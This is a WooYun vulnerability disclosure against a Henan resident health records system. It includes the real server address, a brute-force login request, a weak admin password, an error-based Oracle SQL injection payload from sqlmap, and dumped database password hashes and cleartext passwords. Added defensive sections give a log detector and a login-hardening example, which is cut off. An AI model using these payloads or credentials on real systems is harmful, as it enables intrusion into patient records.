
Vulnerability summary

Defect ID: wooyun-2015-0137966

Title: Weak password and SQL injection in the Henan Province Resident Health Records Information Management System (河南省居民健康档案信息管理系统)

Vendor: Henan Province Resident Health Records Information Management System

Author: 路人甲

Submitted: 2015-09-04 10:36

Fixed: 2015-10-22 08:30

Published: 2015-10-22 08:30

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-09-04: Details sent to the vendor, awaiting the vendor's handling
2015-09-07: Vendor confirmed; details visible to the vendor only
2015-09-17: Details disclosed to core white hats and domain experts
2015-09-27: Details disclosed to regular white hats
2015-10-07: Details disclosed to intern white hats
2015-10-22: Details disclosed to the public

Summary:

It all started from a weak password

Details:

0x01: Management port exposed externally

Screenshot: 管理窗口对外.png


http://61.163.182.31:7001/commons/main/mainframe.html


Nothing to be found there, so I looked at the ports and noticed some interesting ones.
0x02: Breaking into the primary-care system

http://61.163.182.31:80


http://61.163.182.31/His/Login.htm

Screenshot: 自识别username.png


Then I typed admin and it immediately told me this was 超管2 (super admin 2); typing root gave "wrong username". I thought to myself, what a design.
0x03: Brute force, weak password

POST /His/LoginSubmit.htm HTTP/1.1
Host: 61.163.182.31
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://61.163.182.31/His/Login.htm?returnUrl=%2FHis%2FIndex.do
Cookie: JSESSIONID=vv32VvySxGJnFlfHN1p3sG7f736pTGqTLFB0xBCGvsnBj4Gnw1pg!1124919323
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
maskIp=&userName=admin&Name=%E8%B6%85%E7%AE%A12&password=§aaaaa§&returnUrl=%2FHis%2FIndex.do


The password turned out to be 00
0x04: Inside the system you can see a lot of information. Even as super administrator the permissions are still somewhat restricted, but the system has a large number of query functions, so I figured there might be injection.

Screenshot: 系统功能.png


Screenshot: 某菜单功能.png


Screenshot: 城市信息.png


...and so on; there are further functions such as editing drug information and adding drugs, which I will not show here.
0x05: Injection, Oracle, DBA privileges
Captured the requests of a few operations and found injection
Attachment: ceshi.txt

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: officeKindNot (GET)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: officeKindNot=10) AND 5674=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(120)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (5674=5674) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(98)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND (1399=1399
---
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
current user is DBA: True
sqlmap resumed the following injection point(s) from stored session:
---
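As an added defender-side example (not part of the original report), the following Python scans web access logs for the shape of the error-based Oracle payload sqlmap reported above: an XMLType() error vector, strings assembled from CHR()||CHR(), a CASE WHEN ... THEN 1 ELSE 0 END probe selected FROM DUAL, and a numeric tautology. The log lines, client addresses, paths and the combined log format are constructed for the example; the real system's log format is not known from the report.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Added example, not code from the original report. Indicators follow the
# shape of the error-based Oracle payload sqlmap reported on this page.
INDICATORS = {
    "xmltype":    re.compile(r"\bXMLType\s*\(", re.I),
    "chr_concat": re.compile(r"CHR\s*\(\s*\d+\s*\)\s*\|\|", re.I),
    "from_dual":  re.compile(r"\bFROM\s+DUAL\b", re.I),
    "case_probe": re.compile(r"\bCASE\s+WHEN\b.*?\bTHEN\s+1\s+ELSE\s+0\s+END\b", re.I | re.S),
    "tautology":  re.compile(r"\bAND\s*\(?\s*(\d+)\s*=\s*\1\b", re.I),
}
MIN_INDICATORS = 2   # one match alone (e.g. a literal "FROM DUAL") is too weak to alert on

# Combined log format: client, identity, user, [time], "request", status, size, "referer", "agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')


def score_value(value):
    """Return the names of every indicator that matches one decoded parameter value."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(value))


def detect_oracle_error_based_sqli(log_text):
    """Scan access-log text; return one finding per parameter that trips >= MIN_INDICATORS."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, ts, method, target, status, agent = m.groups()
        parts = urlsplit(target)
        # parse_qsl percent-decodes, so "%28" is "(" by the time the patterns run
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            hits = score_value(value)
            if len(hits) >= MIN_INDICATORS:
                findings.append({
                    "client": client, "time": ts, "path": parts.path,
                    "param": name, "status": int(status), "agent": agent,
                    "indicators": hits,
                })
    return findings


# Constructed sample lines (addresses from the RFC 5737 documentation ranges).
# The second line carries the parameter shape from the sqlmap output above,
# URL-encoded the way a server would log it; the others are benign traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Sep/2015:10:31:02 +0800] "GET /His/Office/List.do?officeKindNot=10&page=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Sep/2015:10:31:09 +0800] "GET /His/Office/List.do?officeKindNot=10%29%20AND%205674%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285674%3D5674%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%281399%3D1399 HTTP/1.1" 500 812 "-" "sqlmap/1.0-dev"
198.51.100.2 - - [04/Sep/2015:10:32:41 +0800] "GET /His/Drug/Search.do?name=%E9%98%BF%E8%8E%AB%E8%A5%BF%E6%9E%97&page=2 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in detect_oracle_error_based_sqli(SAMPLE_LOG):
        print(f"{f['client']} {f['path']} param={f['param']} "
              f"status={f['status']} indicators={f['indicators']}")
```

The rule scores the decoded parameter value rather than the User-Agent, since the agent string is trivially changed while the payload structure is what the technique needs; a 500 status on the flagged request is a useful corroborating signal for error-based injection but is not required for a hit.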


#1. Table information

---
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
available databases [21]:
[*] BSHIS
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PLATFORM_YLPT
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] YLPT
[*] YLPT_BSHIS
[*] YLPT_DC
[*] YYGH


#2. Lots of passwords

database management system users password hashes:
[*] _NEXT_USER [1]:
password hash: NULL
[*] ANONYMOUS [1]:
password hash: anonymous
[*] AQ_ADMINISTRATOR_ROLE [1]:
password hash: NULL
[*] AQ_USER_ROLE [1]:
password hash: NULL
[*] AUTHENTICATEDUSER [1]:
password hash: NULL
[*] BSHIS [1]:
password hash: 17BC879AE174221F
clear-text password: BSHIS
[*] CONNECT [1]:
password hash: NULL
[*] CTXAPP [1]:
password hash: NULL
[*] CTXSYS [1]:
password hash: 71E687F036AD56E5
clear-text password: CHANGE_ON_INSTALL
[*] CWM_USER [1]:
password hash: NULL
[*] DBA [1]:
password hash: NULL
[*] DBSNMP [1]:
password hash: E066D214D5421CCC
clear-text password: DBSNMP
[*] DELETE_CATALOG_ROLE [1]:
password hash: NULL
[*] DIP [1]:
password hash: CE4A36B8E06CA59C
clear-text password: DIP
[*] DMSYS [1]:
password hash: BFBA5A553FD9E28A
clear-text password: DMSYS
[*] EJBCLIENT [1]:
password hash: NULL
[*] EXECUTE_CATALOG_ROLE [1]:
password hash: NULL
[*] EXFSYS [1]:
password hash: 66F4EF5650C20355
clear-text password: EXFSYS
[*] EXP_FULL_DATABASE [1]:
password hash: NULL
[*] GATHER_SYSTEM_STATISTICS [1]:
password hash: NULL
[*] GLOBAL_AQ_USER_ROLE [1]:
password hash: GLOBAL
[*] HS_ADMIN_ROLE [1]:
password hash: NULL
[*] IMP_FULL_DATABASE [1]:
password hash: NULL
[*] JAVA_ADMIN [1]:
password hash: NULL
[*] JAVA_DEPLOY [1]:
password hash: NULL
[*] JAVADEBUGPRIV [1]:
password hash: NULL
[*] JAVAIDPRIV [1]:
password hash: NULL
[*] JAVASYSPRIV [1]:
password hash: NULL
[*] JAVAUSERPRIV [1]:
password hash: NULL
[*] LOGSTDBY_ADMINISTRATOR [1]:
password hash: NULL
[*] MDDATA [1]:
password hash: DF02A496267DEE66
clear-text password: MDDATA
[*] MDSYS [1]:
password hash: 72979A94BAD2AF80
clear-text password: MDSYS
[*] MGMT_USER [1]:
password hash: NULL
[*] MGMT_VIEW [1]:
password hash: 2DA6A02DB4DA34C8
[*] OEM_ADVISOR [1]:
password hash: NULL
[*] OEM_MONITOR [1]:
password hash: NULL
[*] OLAP_DBA [1]:
password hash: NULL
[*] OLAP_USER [1]:
password hash: NULL
[*] OLAPI_TRACE_USER [1]:
password hash: NULL
[*] OLAPSYS [1]:
password hash: 4AC23CC3B15E2208
[*] ORACLE_OCM [1]:
password hash: 5A2E026A9157958C
[*] ORDPLUGINS [1]:
password hash: 88A2B2C183431F00
clear-text password: ORDPLUGINS
[*] ORDSYS [1]:
password hash: 7EFA02EC7EA6B86F
clear-text password: ORDSYS
[*] OUTLN [1]:
password hash: 4A3BA55E08595C81
clear-text password: OUTLN
[*] PLATFORM_YLPT [1]:
password hash: D0F22043E9573328
clear-text password: PLATFORM_YLPT
[*] PUBLIC [1]:
password hash: NULL
[*] RECOVERY_CATALOG_OWNER [1]:
password hash: NULL
[*] RESOURCE [1]:
password hash: NULL
[*] SCHEDULER_ADMIN [1]:
password hash: NULL
[*] SCOTT [1]:
password hash: F894844C34402B67
clear-text password: TIGER
[*] SELECT_CATALOG_ROLE [1]:
password hash: NULL
[*] SI_INFORMTN_SCHEMA [1]:
password hash: 84B8CBCA4D477FA3
clear-text password: SI_INFORMTN_SCHEMA
[*] SYS [1]:
password hash: 2C185D9F5E501FEC
[*] SYSMAN [1]:
password hash: 447B729161192C24
clear-text password: SYSMAN
[*] SYSTEM [1]:
password hash: 7901A72C29DEE20C
[*] TSMSYS [1]:
password hash: 3DF26A8B17D0F29F
clear-text password: TSMSYS
[*] WM_ADMIN_ROLE [1]:
password hash: NULL
[*] WMSYS [1]:
password hash: 7C9BA362F8314299
clear-text password: WMSYS
[*] XDB [1]:
password hash: 88D8364765FCE6AF
clear-text password: CHANGE_ON_INSTALL
[*] XDBADMIN [1]:
password hash: NULL
[*] XDBWEBSERVICES [1]:
password hash: NULL
[*] YLPT [1]:
password hash: 0D550B302D6C4B38
clear-text password: YLPT
[*] YLPT_BSHIS [1]:
password hash: CD403560DD29CC1D
clear-text password: YLPT_BSHIS
[*] YLPT_DC [1]:
password hash: 3446F9C3472B6536
clear-text password: YLPT_DC
[*] YYGH [1]:
password hash: E4BD60D5FFFDE1D1
clear-text password: YYGH


#3. Contents of one of them (SYS)

Database: SYS
[533 tables]
+--------------------------------+
| DUAL |
| ACCESS$ |
| ALERT_QT |
| APPLY$_CONF_HDLR_COLUMNS |
| APPLY$_CONSTRAINT_COLUMNS |
| APPLY$_DEST_OBJ |
| APPLY$_DEST_OBJ_CMAP |
| APPLY$_DEST_OBJ_OPS |
| APPLY$_ERROR |
| APPLY$_ERROR_HANDLER |
| APPLY$_ERROR_TXN |
| APPLY$_SOURCE_OBJ |
| APPLY$_SOURCE_SCHEMA |
| APPLY$_VIRTUAL_OBJ_CONS |
| APPROLE$ |
| AQ$_ALERT_QT_S |
| AQ$_AQ$_MEM_MC_S |
| AQ$_KUPC$DATAPUMP_QUETAB_S |
| AQ$_MEM_MC |
| AQ$_MESSAGE_TYPES |
| AQ$_PENDING_MESSAGES |
| AQ$_PROPAGATION_STATUS |
| AQ$_PUBLISHER |
| AQ$_QUEUE_STATISTICS |
| AQ$_QUEUE_TABLE_AFFINITIES |
| AQ$_REPLAY_INFO |
| AQ$_SCHEDULER$_EVENT_QTAB_S |
| AQ$_SCHEDULER$_JOBQTAB_S |
| AQ$_SCHEDULES |
| AQ_EVENT_TABLE |
| AQ_SRVNTFN_TABLE |
| ARGUMENT$ |
| ASSOCIATION$ |
| ATTRCOL$ |
| ATTRIBUTE$ |
| ATTRIBUTE_TRANSFORMATIONS$ |
| AUD$ |
| AUDIT$ |
| AUDIT_ACTIONS |
| AUX_STATS$ |
| AW$ |
| AW_OBJ$ |
| AW_PROP$ |
| BOOTSTRAP$ |
| CACHE_STATS_0$ |
| CACHE_STATS_1$ |
| CCOL$ |
| CDC_CHANGE_COLUMNS$ |
| CDC_CHANGE_SETS$ |
| CDC_CHANGE_SOURCES$ |
| CDC_CHANGE_TABLES$ |
| CDC_PROPAGATED_SETS$ |
| CDC_PROPAGATIONS$ |
| CDC_SUBSCRIBED_COLUMNS$ |
| CDC_SUBSCRIBED_TABLES$ |
| CDC_SUBSCRIBERS$ |
| CDC_SYSTEM$ |
| CDEF$ |
| CLU$ |
| COL$ |
| COLLECTION$ |
| COLTYPE$ |
| COL_USAGE$ |
| COM$ |
| CON$ |
| CONTEXT$ |
| DBMS_ALERT_INFO |
| DBMS_LOCK_ALLOCATED |
| DEFROLE$ |
| DEFSUBPART$ |
| DEFSUBPARTLOB$ |
| DEPENDENCY$ |
| DIM$ |
| DIMATTR$ |
| DIMJOINKEY$ |
| DIMLEVEL$ |
| DIMLEVELKEY$ |
| DIR$ |
| DIR$ALERT_HISTORY |
| DIR$DATABASE_ATTRIBUTES |
| DIR$ESCALATE_OPERATIONS |
| DIR$INSTANCE_ACTIONS |
| DIR$MIGRATE_OPERATIONS |
| DIR$NODE_ATTRIBUTES |
| DIR$QUIESCE_OPERATIONS |
| DIR$REASON_STRINGS |
| DIR$RESONATE_OPERATIONS |
| DIR$SERVICE_ATTRIBUTES |
| DIR$SERVICE_OPERATIONS |
| DIR$VICTIM_POLICY |
| DUC$ |
| ENC$ |
| ERROR$ |
| EXPACT$ |
| EXPDEPACT$ |
| EXPDEPOBJ$ |
| EXPIMP_TTS_CT$ |
| EXPPKGACT$ |
| EXPPKGOBJ$ |
| EXTERNAL_LOCATION$ |
| EXTERNAL_TAB$ |
| FET$ |
| FGA$ |
| FGACOL$ |
| FGA_LOG$ |
| FGR$_FILE_GROUPS |
| FGR$_FILE_GROUP_EXPORT_INFO |
| FGR$_FILE_GROUP_FILES |
| FGR$_FILE_GROUP_VERSIONS |
| FGR$_TABLESPACE_INFO |
| FGR$_TABLE_INFO |
| FILE$ |
| FIXED_OBJ$ |
| HIER$ |
| HIERLEVEL$ |
| HISTGRM$ |
| HIST_HEAD$ |
| HS$_BASE_CAPS |
| HS$_BASE_DD |
| HS$_CLASS_CAPS |
| HS$_CLASS_DD |
| HS$_CLASS_INIT |
| HS$_FDS_CLASS |
| HS$_FDS_CLASS_DATE |
| HS$_FDS_INST |
| HS$_INST_CAPS |
| HS$_INST_DD |
| HS$_INST_INIT |
| ICOL$ |
| ICOLDEP$ |
| IDL_CHAR$ |
| IDL_SB4$ |
| IDL_UB1$ |
| IDL_UB2$ |
| ID_GENS$ |
| INCEXP |
| INCFIL |
| INCVID |
| IND$ |
| INDARRAYTYPE$ |
| INDCOMPART$ |
| INDOP$ |
| INDPART$ |
| INDPART_PARAM$ |
| INDSUBPART$ |
| INDTYPES$ |
| IND_ONLINE$ |
| IND_STATS$ |
| INVALIDATION_REGISTRY$ |
| JAVAOBJ$ |
| JAVASNM$ |
| JIJOIN$ |
| JIREFRESHSQL$ |
| JOB$ |
| KOPM$ |
| KUPC$DATAPUMP_QUETAB |
| KU_NOEXP_TAB |
| LIBRARY$ |
| LINK$ |
| LOB$ |
| LOBCOMPPART$ |
| LOBFRAG$ |
| LOC$ |
| LOG$ |
| LOGMNRG_ATTRCOL$ |
| LOGMNRG_ATTRIBUTE$ |
| LOGMNRG_CCOL$ |
| LOGMNRG_CDEF$ |
| LOGMNRG_COL$ |
| LOGMNRG_COLTYPE$ |
| LOGMNRG_DICTIONARY$ |
| LOGMNRG_ICOL$ |
| LOGMNRG_IND$ |
| LOGMNRG_INDCOMPART$ |
| LOGMNRG_INDPART$ |
| LOGMNRG_INDSUBPART$ |
| LOGMNRG_LOB$ |
| LOGMNRG_LOBFRAG$ |
| LOGMNRG_OBJ$ |
| LOGMNRG_SEED$ |
| LOGMNRG_TAB$ |
| LOGMNRG_TABCOMPART$ |
| LOGMNRG_TABPART$ |
| LOGMNRG_TABSUBPART$ |
| LOGMNRG_TS$ |
| LOGMNRG_TYPE$ |
| LOGMNRG_USER$ |
| LOGMNR_BUILDLOG |
| LOGMNR_INTERESTING_COLS |
| MAP_COMPLIST$ |
| MAP_ELEMENT$ |
| MAP_EXTELEMENT$ |
| MAP_FILE$ |
| MAP_FILE_EXTENT$ |
| MAP_SUBELEMENT$ |
| METAFILTER$ |
| METANAMETRANS$ |
| METAPATHMAP$ |
| METASCRIPT$ |
| METASCRIPTFILTER$ |
| METASTYLESHEET |
| METAVIEW$ |
| METAXSL$ |
| METAXSLPARAM$ |
| METHOD$ |
| MIGRATE$ |
| MLOG$ |
| MLOG_REFCOL$ |
| MON_MODS$ |
| MON_MODS_ALL$ |
| NCOMP_DLL$ |
| NOEXP$ |
| NTAB$ |
| OBJ$ |
| OBJAUTH$ |
| OBJECT_USAGE |
| OBJPRIV$ |
| OID$ |
| OPANCILLARY$ |
| OPARG$ |
| OPBINDING$ |
| OPERATOR$ |
| OPQTYPE$ |
| OPTSTAT_HIST_CONTROL$ |
| PARAMETER$ |
| PARTCOL$ |
| PARTLOB$ |
| PARTOBJ$ |
| PENDING_SESSIONS$ |
| PENDING_SUB_SESSIONS$ |
| PENDING_TRANS$ |
| PROCEDURE$ |
| PROCEDUREC$ |
| PROCEDUREINFO$ |
| PROCEDUREJAVA$ |
| PROCEDUREPLSQL$ |
| PROFILE$ |
| PROFNAME$ |
| PROPS$ |
| PROXY_DATA$ |
| PROXY_INFO$ |
| PROXY_ROLE_DATA$ |
| PROXY_ROLE_INFO$ |
| PS$ |
| RECO_SCRIPT$ |
| RECO_SCRIPT_BLOCK$ |
| RECO_SCRIPT_ERROR$ |
| RECO_SCRIPT_PARAMS$ |
| RECYCLEBIN$ |
| REC_TAB$ |
| REC_VAR$ |
| REDEF$ |
| REDEF_DEP_ERROR$ |
| REDEF_OBJECT$ |
| REFCON$ |
| REG$ |
| REGISTRY$ |
| REGISTRY$DATABASE |
| REGISTRY$HISTORY |
| REGISTRY$LOG |
| REGISTRY$SCHEMAS |
| REG_SNAP$ |
| RESOURCE_CONSUMER_GROUP$ |
| RESOURCE_COST$ |
| RESOURCE_GROUP_MAPPING$ |
| RESOURCE_MAP |
| RESOURCE_MAPPING_PRIORITY$ |
| RESOURCE_PLAN$ |
| RESOURCE_PLAN_DIRECTIVE$ |
| RESULT$ |
| RGCHILD$ |
| RGROUP$ |
| RLS$ |
| RLS_CTX$ |
| RLS_GRP$ |
| RLS_SC$ |
| RULE$ |
| RULESET$ |
| RULE_EC$ |
| RULE_MAP$ |
| RULE_SET$ |
| RULE_SET_EE$ |
| RULE_SET_FOB$ |
| RULE_SET_IEUAC$ |
| RULE_SET_NL$ |
| RULE_SET_RDEP$ |
| RULE_SET_RE$ |
| RULE_SET_ROR$ |
| RULE_SET_TE$ |
| RULE_SET_VE$ |
| SCHEDULER$_CHAIN |
| SCHEDULER$_CLASS |
| SCHEDULER$_EVENT_LOG |
| SCHEDULER$_EVENT_QTAB |
| SCHEDULER$_EVTQ_SUB |
| SCHEDULER$_GLOBAL_ATTRIBUTE |
| SCHEDULER$_JOB |
| SCHEDULER$_JOBQTAB |
| SCHEDULER$_JOB_ARGUMENT |
| SCHEDULER$_JOB_RUN_DETAILS |
| SCHEDULER$_OLDOIDS |
| SCHEDULER$_PROGRAM |
| SCHEDULER$_PROGRAM_ARGUMENT |
| SCHEDULER$_SCHEDULE |
| SCHEDULER$_SRCQ_INFO |
| SCHEDULER$_SRCQ_MAP |
| SCHEDULER$_STEP |
| SCHEDULER$_STEP_STATE |
| SCHEDULER$_WINDOW |
| SCHEDULER$_WINDOW_DETAILS |
| SCHEDULER$_WINDOW_GROUP |
| SCHEDULER$_WINGRP_MEMBER |
| SECOBJ$ |
| SEG$ |
| SEQ$ |
| SERVICE$ |
| SETTINGS$ |
| SLOG$ |
| SMON_SCN_TIME |
| SNAP$ |
| SNAP_COLMAP$ |
| SNAP_LOADERTIME$ |
| SNAP_LOGDEP$ |
| SNAP_OBJCOL$ |
| SNAP_REFOP$ |
| SNAP_REFTIME$ |
| SNAP_SITE$ |
| SOURCE$ |
| SQL$ |
| SQL$TEXT |
| SQLPROF$ |
| SQLPROF$ATTR |
| SQLPROF$DESC |
| SQL_VERSION$ |
| STATS_TARGET$ |
| STMT_AUDIT_OPTION_MAP |
| STREAMS$_APPLY_MILESTONE |
| STREAMS$_APPLY_PROCESS |
| STREAMS$_APPLY_PROGRESS |
| STREAMS$_APPLY_SPILL_MESSAGES |
| STREAMS$_APPLY_SPILL_TXN |
| STREAMS$_APPLY_SPILL_TXN_LIST |
| STREAMS$_CAPTURE_PROCESS |
| STREAMS$_DEF_PROC |
| STREAMS$_DEST_OBJS |
| STREAMS$_DEST_OBJ_COLS |
| STREAMS$_EXTRA_ATTRS |
| STREAMS$_INTERNAL_TRANSFORM |
| STREAMS$_KEY_COLUMNS |
| STREAMS$_MESSAGE_CONSUMERS |
| STREAMS$_MESSAGE_RULES |
| STREAMS$_PREPARE_DDL |
| STREAMS$_PREPARE_OBJECT |
| STREAMS$_PRIVILEGED_USER |
| STREAMS$_PROCESS_PARAMS |
| STREAMS$_PROPAGATION_PROCESS |
| STREAMS$_RULES |
| SUBCOLTYPE$ |
| SUBPARTCOL$ |
| SUM$ |
| SUMAGG$ |
| SUMDELTA$ |
| SUMDEP$ |
| SUMDETAIL$ |
| SUMINLINE$ |
| SUMJOIN$ |
| SUMKEY$ |
| SUMPARTLOG$ |
| SUMPRED$ |
| SUMQB$ |
| SUPEROBJ$ |
| SYN$ |
| SYSAUTH$ |
| SYSTEM_PRIVILEGE_MAP |
| SYS_IOT_OVER_4510 |
| SYS_IOT_OVER_4516 |
| SYS_IOT_OVER_4520 |
| SYS_IOT_OVER_5125 |
| SYS_IOT_OVER_5213 |
| SYS_IOT_OVER_7489 |
| SYS_IOT_OVER_8767 |
| SYS_IOT_OVER_8854 |
| TAB$ |
| TABCOMPART$ |
| TABLE_PRIVILEGE_MAP |
| TABPART$ |
| TABSUBPART$ |
| TAB_STATS$ |
| TRANSFORMATIONS$ |
| TRIGGER$ |
| TRIGGERCOL$ |
| TRIGGERJAVAC$ |
| TRIGGERJAVAF$ |
| TRIGGERJAVAM$ |
| TRIGGERJAVAS$ |
| TRUSTED_LIST$ |
| TS$ |
| TSM_DST$ |
| TSM_SRC$ |
| TSQ$ |
| TYPE$ |
| TYPED_VIEW$ |
| TYPEHIERARCHY$ |
| TYPE_MISC$ |
| UET$ |
| UGROUP$ |
| UNDO$ |
| USER$ |
| USER_ASTATUS_MAP |
| USER_HISTORY$ |
| USTATS$ |
| UTL_RECOMP_ERRORS |
| VIEW$ |
| VIEWCON$ |
| VIEWTRCOL$ |
| VTABLE$ |
| WARNING_SETTINGS$ |
| WRH$_ACTIVE_SESSION_HISTORY_BL |
| WRH$_BG_EVENT_SUMMARY |
| WRH$_BUFFERED_QUEUES |
| WRH$_BUFFERED_SUBSCRIBERS |
| WRH$_BUFFER_POOL_STATISTICS |
| WRH$_COMP_IOSTAT |
| WRH$_CR_BLOCK_SERVER |
| WRH$_CURRENT_BLOCK_SERVER |
| WRH$_DATAFILE |
| WRH$_DB_CACHE_ADVICE_BL |
| WRH$_DLM_MISC_BL |
| WRH$_ENQUEUE_STAT |
| WRH$_EVENT_NAME |
| WRH$_FILEMETRIC_HISTORY |
| WRH$_FILESTATXS_BL |
| WRH$_INSTANCE_RECOVERY |
| WRH$_INST_CACHE_TRANSFER_BL |
| WRH$_JAVA_POOL_ADVICE |
| WRH$_LATCH_BL |
| WRH$_LATCH_CHILDREN_BL |
| WRH$_LATCH_MISSES_SUMMARY_BL |
| WRH$_LATCH_NAME |
| WRH$_LATCH_PARENT_BL |
| WRH$_LIBRARYCACHE |
| WRH$_LOG |
| WRH$_METRIC_NAME |
| WRH$_MTTR_TARGET_ADVICE |
| WRH$_OPTIMIZER_ENV |
| WRH$_OSSTAT_BL |
| WRH$_OSSTAT_NAME |
| WRH$_PARAMETER_BL |
| WRH$_PARAMETER_NAME |
| WRH$_PGASTAT |
| WRH$_PGA_TARGET_ADVICE |
| WRH$_PROCESS_MEMORY_SUMMARY |
| WRH$_RESOURCE_LIMIT |
| WRH$_ROWCACHE_SUMMARY_BL |
| WRH$_SEG_STAT_BL |
| WRH$_SEG_STAT_OBJ |
| WRH$_SERVICE_NAME |
| WRH$_SERVICE_STAT_BL |
| WRH$_SERVICE_WAIT_CLASS_BL |
| WRH$_SESSMETRIC_HISTORY |
| WRH$_SESS_TIME_STATS |
| WRH$_SGA |
| WRH$_SGASTAT_BL |
| WRH$_SGA_TARGET_ADVICE |
| WRH$_SHARED_POOL_ADVICE |
| WRH$_SQLSTAT_BL |
| WRH$_SQLTEXT |
| WRH$_SQL_BIND_METADATA |
| WRH$_SQL_PLAN |
| WRH$_SQL_SUMMARY |
| WRH$_SQL_WORKAREA_HISTOGRAM |
| WRH$_STAT_NAME |
| WRH$_STREAMS_APPLY_SUM |
| WRH$_STREAMS_CAPTURE |
| WRH$_STREAMS_POOL_ADVICE |
| WRH$_SYSMETRIC_HISTORY |
| WRH$_SYSMETRIC_SUMMARY |
| WRH$_SYSSTAT_BL |
| WRH$_SYSTEM_EVENT_BL |
| WRH$_SYS_TIME_MODEL_BL |
| WRH$_TABLESPACE_SPACE_USAGE |
| WRH$_TABLESPACE_STAT_BL |
| WRH$_TEMPFILE |
| WRH$_TEMPSTATXS |
| WRH$_THREAD |
| WRH$_UNDOSTAT |
| WRH$_WAITCLASSMETRIC_HISTORY |
| WRH$_WAITSTAT_BL |
| WRI$_ADV_ACTIONS |
| WRI$_ADV_DEFINITIONS |
| WRI$_ADV_DEF_PARAMETERS |
| WRI$_ADV_DIRECTIVES |
| WRI$_ADV_FINDINGS |
| WRI$_ADV_JOURNAL |
| WRI$_ADV_MESSAGE_GROUPS |
| WRI$_ADV_OBJECTS |
| WRI$_ADV_PARAMETERS |
| WRI$_ADV_RATIONALE |
| WRI$_ADV_RECOMMENDATIONS |
| WRI$_ADV_REC_ACTIONS |
| WRI$_ADV_SQLA_FAKE_REG |
| WRI$_ADV_SQLA_MAP |
| WRI$_ADV_SQLA_STMTS |
| WRI$_ADV_SQLA_TMP |
| WRI$_ADV_SQLW_COLVOL |
| WRI$_ADV_SQLW_STMTS |
| WRI$_ADV_SQLW_SUM |
| WRI$_ADV_SQLW_TABLES |
| WRI$_ADV_SQLW_TABVOL |
| WRI$_ADV_TASKS |
| WRI$_ADV_USAGE |
| WRI$_AGGREGATION_ENABLED |
| WRI$_ALERT_HISTORY |
| WRI$_ALERT_OUTSTANDING |
| WRI$_ALERT_THRESHOLD |
| WRI$_ALERT_THRESHOLD_LOG |
| WRI$_DBU_CPU_USAGE |
| WRI$_DBU_CPU_USAGE_SAMPLE |
| WRI$_DBU_FEATURE_METADATA |
| WRI$_DBU_FEATURE_USAGE |
| WRI$_DBU_HIGH_WATER_MARK |
| WRI$_DBU_HWM_METADATA |
| WRI$_DBU_USAGE_SAMPLE |
| WRI$_OPTSTAT_AUX_HISTORY |
| WRI$_OPTSTAT_HISTGRM_HISTORY |
| WRI$_OPTSTAT_HISTHEAD_HISTORY |
| WRI$_OPTSTAT_IND_HISTORY |
| WRI$_OPTSTAT_OPR |
| WRI$_OPTSTAT_TAB_HISTORY |
| WRI$_SEGADV_CNTRLTAB |
| WRI$_SEGADV_OBJLIST |
| WRI$_TRACING_ENABLED |
| _DEFAULT_AUDITING_OPTIONS_ |
+--------------------------------+


#4. Executing SQL commands directly

Screenshot: sql执行.png


#5. Lots of tables; did not finish dumping them

Screenshot: 很多表.png

Proof of vulnerability:

Screenshot: 城市信息.png


Screenshot: 存在注入.png


Screenshot: SYSTEM表.png

Remediation:

Do not expose the login page to the internet
Remove the automatic username recognition on the login page
Filter whatever can be filtered?
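The second and third fixes can be illustrated in code. The following Python is an added example, not the reported system's code: sqlite3 stands in for the Oracle back end, the user table and its weak password are constructed, and the lockout threshold and duration are assumed policy values. It puts the login pattern the report describes (a reply that reveals whether the username exists and what role it has, a query built by string concatenation) next to a hardened form (one generic failure message, a bound parameter, a per-account lockout, and a constant-time hash comparison that runs whether or not the user exists).

```python
import hashlib
import hmac
import os
import sqlite3
import time

# Added example, not code from the reported system. sqlite3 stands in for the
# Oracle back end; the user table, the weak password and the policy numbers
# below are all constructed for the example.
MAX_FAILURES = 5         # assumed lockout threshold
LOCKOUT_SECONDS = 900    # assumed lockout duration
GENERIC_MSG = "invalid username or password"
PBKDF2_ROUNDS = 100_000


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


# Compared against when the account does not exist, so an unknown username
# costs the same time as a known one.
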